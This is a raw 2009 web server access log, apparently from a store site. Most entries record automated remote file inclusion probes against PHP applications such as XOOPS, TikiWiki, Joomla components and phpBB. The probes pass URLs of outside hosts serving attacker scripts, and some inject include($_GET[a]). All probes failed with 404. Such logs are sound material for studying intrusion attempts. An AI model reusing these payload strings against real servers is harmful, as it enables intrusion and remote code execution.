200.93.147.154 - - [19/May/2009:03:20:53 -0400] "GET /logs/access_log.Q108120600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:03:20:54 -0400] "GET /logs/access_log.Q108061500%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:03:20:54 -0400] "GET /logs/access_log.Q108120600%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
203.151.233.72 - - [19/May/2009:03:20:56 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.blixweb.no/rhey/software/Fire%20scan/idfire.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
64.34.161.16 - - [19/May/2009:03:21:34 -0400] "GET /logs/access_log.Q108090400/modules/Ultrastats/include/functions_common.php?gl_root_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
64.34.161.16 - - [19/May/2009:03:21:34 -0400] "GET /logs/access_log.Q108020500/modules/Ultrastats/include/functions_common.php?gl_root_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
66.249.72.114 - - [19/May/2009:03:21:38 -0400] "GET /logs/error_log.Q108052000 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [19/May/2009:03:21:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.122.26.5 - - [19/May/2009:03:22:29 -0400] "GET /logs/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.122.26.5 - - [19/May/2009:03:22:29 -0400] "GET /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
222.122.26.5 - - [19/May/2009:03:22:29 -0400] "GET /logs/access_log.Q108090400/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.185.20.88 - - [19/May/2009:03:23:28 -0400] "GET /logs/errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.185.20.88 - - [19/May/2009:03:23:29 -0400] "GET /errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.185.20.88 - - [19/May/2009:03:23:29 -0400] "GET /logs/error_log.Q109042900%20%20/errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
80.237.146.58 - - [19/May/2009:03:23:39 -0400] "GET /logs/access_log.Q108091400//modules/vwar/admin/admin.php?vwar_root=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
80.237.146.58 - - [19/May/2009:03:23:41 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
80.237.146.58 - - [19/May/2009:03:23:41 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.175.180.194 - - [19/May/2009:03:24:03 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.175.180.194 - - [19/May/2009:03:24:03 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
209.175.180.194 - - [19/May/2009:03:24:03 -0400] "GET /logs/access_log.Q108091400//modules/vwar/admin/admin.php?vwar_root=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
80.237.146.58 - - [19/May/2009:03:24:06 -0400] "GET /logs/access_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
195.5.168.93 - - [19/May/2009:03:24:14 -0400] "GET /logs/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
195.5.168.93 - - [19/May/2009:03:24:14 -0400] "GET /logs/access_log.Q108081100%20%20/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.5.168.93 - - [19/May/2009:03:24:14 -0400] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
195.5.168.93 - - [19/May/2009:03:24:15 -0400] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
195.5.168.93 - - [19/May/2009:03:24:15 -0400] "GET /logs/access_log.Q108081100%20%20/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.5.168.93 - - [19/May/2009:03:24:17 -0400] "GET /logs/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
209.175.180.194 - - [19/May/2009:03:24:39 -0400] "GET /logs/access_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
80.90.20.125 - - [19/May/2009:03:24:50 -0400] "GET /logs/access_log.Q108073000//oneadmin/photogallery/include.php?path[docroot]=http://www.tkcchoir.org/xml/pw.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
200.93.147.154 - - [19/May/2009:03:25:39 -0400] "GET /logs/access_log.Q108061500%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:03:25:39 -0400] "GET /logs/access_log.Q108120600%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
118.45.190.166 - - [19/May/2009:03:25:55 -0400] "GET /logs/access_log.Q108081500//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
118.45.190.166 - - [19/May/2009:03:25:55 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
118.45.190.166 - - [19/May/2009:03:25:56 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
209.175.180.194 - - [19/May/2009:03:26:11 -0400] "GET /logs/access_log.Q108091400%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
209.175.180.194 - - [19/May/2009:03:26:19 -0400] "GET /logs/access_log.Q109051000%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:03:26:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.18.76.16 - - [19/May/2009:03:27:00 -0400] "GET /logs/access_log.Q108090200///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
217.18.76.16 - - [19/May/2009:03:27:01 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
217.18.76.16 - - [19/May/2009:03:27:01 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
195.5.168.93 - - [19/May/2009:03:27:54 -0400] "GET /logs/access_log.Q108082900/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
87.51.48.38 - - [19/May/2009:03:28:29 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L10739E4221017900C6ED09T+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.51.48.38 - - [19/May/2009:03:28:29 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L10739E4221017900C6ED09T+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.51.48.38 - - [19/May/2009:03:28:29 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L10739E4221017900C6ED09T+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.51.48.38 - - [19/May/2009:03:28:30 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L10739E4221017900C6ED09T+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.51.48.38 - - [19/May/2009:03:28:30 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L10739E4221017900C6ED09T+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.51.48.38 - - [19/May/2009:03:28:36 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L10739E4221017900C6ED09T+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
72.30.79.49 - - [19/May/2009:03:28:38 -0400] "GET /logs/access_log.Q108101500 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.51.48.38 - - [19/May/2009:03:28:38 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L10739E4221017900C6ED09T+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.51.48.38 - - [19/May/2009:03:28:39 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.51.48.38 - - [19/May/2009:03:28:39 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.51.48.38 - - [19/May/2009:03:28:41 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.51.48.38 - - [19/May/2009:03:28:41 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
208.64.202.134 - - [19/May/2009:03:28:46 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
208.64.202.134 - - [19/May/2009:03:28:46 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
208.64.202.134 - - [19/May/2009:03:28:46 -0400] "GET /logs/access_log.Q108061500//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
208.64.202.134 - - [19/May/2009:03:28:46 -0400] "GET /logs/access_log.Q108120600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
208.64.202.134 - - [19/May/2009:03:28:46 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
208.64.202.134 - - [19/May/2009:03:28:46 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
208.64.202.134 - - [19/May/2009:03:28:46 -0400] "GET /logs/access_log.Q108061500//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
208.64.202.134 - - [19/May/2009:03:28:46 -0400] "GET /logs/access_log.Q108120600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
118.45.190.166 - - [19/May/2009:03:30:09 -0400] "GET /logs/access_log.Q108081000//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
208.64.202.134 - - [19/May/2009:03:31:30 -0400] "GET /logs/access_log.Q108061500%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
208.64.202.134 - - [19/May/2009:03:31:30 -0400] "GET /logs/access_log.Q108120600%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
208.64.202.134 - - [19/May/2009:03:31:41 -0400] "GET /logs/access_log.Q108061500%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
208.64.202.134 - - [19/May/2009:03:31:41 -0400] "GET /logs/access_log.Q108120600%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:03:32:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.18.76.16 - - [19/May/2009:03:32:46 -0400] "GET /logs/access_log.Q108052400///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
218.185.20.88 - - [19/May/2009:03:33:23 -0400] "GET /logs/access_log.Q108122500/errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
119.73.44.141 - - [19/May/2009:03:34:09 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; SIMBAR={94F1D6A5-1B36-4CFD-8DA7-0B4E7F08EDD8}; yie8)"
119.73.44.141 - - [19/May/2009:03:34:09 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; SIMBAR={94F1D6A5-1B36-4CFD-8DA7-0B4E7F08EDD8}; yie8)"
201.28.103.46 - - [19/May/2009:03:34:23 -0400] "GET /logs/access_log.Q109051100/shop/index.php?_shop_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
201.28.103.46 - - [19/May/2009:03:34:23 -0400] "GET /logs/shop/index.php?_shop_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
201.28.103.46 - - [19/May/2009:03:34:23 -0400] "GET /shop/index.php?_shop_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.185.20.88 - - [19/May/2009:03:34:25 -0400] "GET /logs/error_log.Q109042900/errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.185.20.88 - - [19/May/2009:03:34:32 -0400] "GET /logs/access_log.Q109050300/errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
119.73.44.141 - - [19/May/2009:03:34:34 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; SIMBAR={94F1D6A5-1B36-4CFD-8DA7-0B4E7F08EDD8}; yie8)"
119.73.44.141 - - [19/May/2009:03:34:34 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; SIMBAR={94F1D6A5-1B36-4CFD-8DA7-0B4E7F08EDD8}; yie8)"
211.115.89.68 - - [19/May/2009:03:36:28 -0400] "GET //index.php?_shop_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.115.89.68 - - [19/May/2009:03:36:28 -0400] "GET /logs//index.php?_shop_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.115.89.68 - - [19/May/2009:03:36:28 -0400] "GET /logs/access_log.Q109051100//index.php?_shop_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:03:37:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
189.164.25.243 - - [19/May/2009:03:37:26 -0400] "GET /logs/errors.php?error=http://www.reda-ek.com/twg/counter/id? HTTP/1.0" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.143.98.5 - - [19/May/2009:03:37:37 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:37:37 -0400] "GET /logs/access_log.Q108082100//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:37:37 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:37:40 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:37:40 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:37:40 -0400] "GET /logs/access_log.Q108082100//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:37:50 -0400] "GET /logs/access_log.Q108080900//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:37:50 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:37:50 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:37:50 -0400] "GET /logs/access_log.Q108082100%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:37:51 -0400] "GET /logs/access_log.Q108080900//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:37:51 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:37:51 -0400] "GET /logs/access_log.Q108082100%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:37:51 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:37:56 -0400] "GET /logs/access_log.Q108080900%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
77.221.130.19 - - [19/May/2009:03:37:57 -0400] "GET /logs/access_log.Q109030500/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://pop-trash.com/classic/louis/blid.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
77.221.130.19 - - [19/May/2009:03:37:57 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://pop-trash.com/classic/louis/blid.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
77.221.130.19 - - [19/May/2009:03:37:58 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://pop-trash.com/classic/louis/blid.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
123.143.98.5 - - [19/May/2009:03:38:00 -0400] "GET /logs/access_log.Q108080900%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
110.45.144.106 - - [19/May/2009:03:38:46 -0400] "GET //modules/Forums/admin/errors.php?error=http://shw.or.kr/bbs/bbs_public/06notice/test.txt??? HTTP/1.1" 404 230 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
110.45.144.106 - - [19/May/2009:03:38:46 -0400] "GET /logs//modules/Forums/admin/errors.php?error=http://shw.or.kr/bbs/bbs_public/06notice/test.txt??? HTTP/1.1" 404 235 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
123.143.98.5 - - [19/May/2009:03:38:51 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:38:51 -0400] "GET /logs/access_log.Q108090100//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:38:51 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.28.103.46 - - [19/May/2009:03:38:52 -0400] "GET /logs/access_log.Q109051100%20%20/shop/index.php?_shop_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:38:53 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:38:53 -0400] "GET /logs/access_log.Q108090100//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:38:53 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [19/May/2009:03:39:10 -0400] "GET /logs/access_log.Q108102400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
